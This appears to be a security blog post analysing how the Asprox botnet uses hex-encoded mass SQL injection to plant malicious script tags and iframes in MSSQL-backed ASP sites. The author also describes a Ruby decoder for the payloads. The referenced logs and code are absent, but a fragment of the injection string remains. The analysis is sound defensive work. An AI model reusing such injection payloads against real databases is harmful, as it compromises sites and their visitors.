Mass SQL Injection And Asprox Bot

Asprox is one of the botnet that implements mass sql injection to inject malicious *.js script into MSSQL database server. Normally Asprox bot will search for any vulnerable (sql injection, of course) *.asp script to inject the malicious *.js script and iframe into database. Typical sql injection is similar to log below:

It’s a little bit annoying to decode all the hex chars. It’s obvious that the sql injection input is about to bypass string-based content filtering :). Out of curiosity about this sql injection, i managed to code a little ruby code to decode the sql injection (using normal trick by converting hex input via cast function). Below is the result, sample usage of the code and sample output:

Since in this sql injection, it used double payload of hex trick. So i need to re-execute the code again for this one:

all the output need to concat again with previous string like AS vaRcHaR(4000));eXeC (@s);–. So the final sql statement will look similar to this:

From the output, we knew that attacker try to inject into the database by injecting <script src=>. This script will later on will be used as iframe on the compromised database/web server to silently fetch a ads.js. Unfortunately, the ads.js is no longer available during this blog entry posted.

Below is the simple ruby code for the decoding hex values. Your need to supply input within cast functions.

Here is how u can use the code:

* don’t forget to use quote (‘ ‘) when key in your input.

Leave a Reply

Your email address will not be published. Required fields are marked *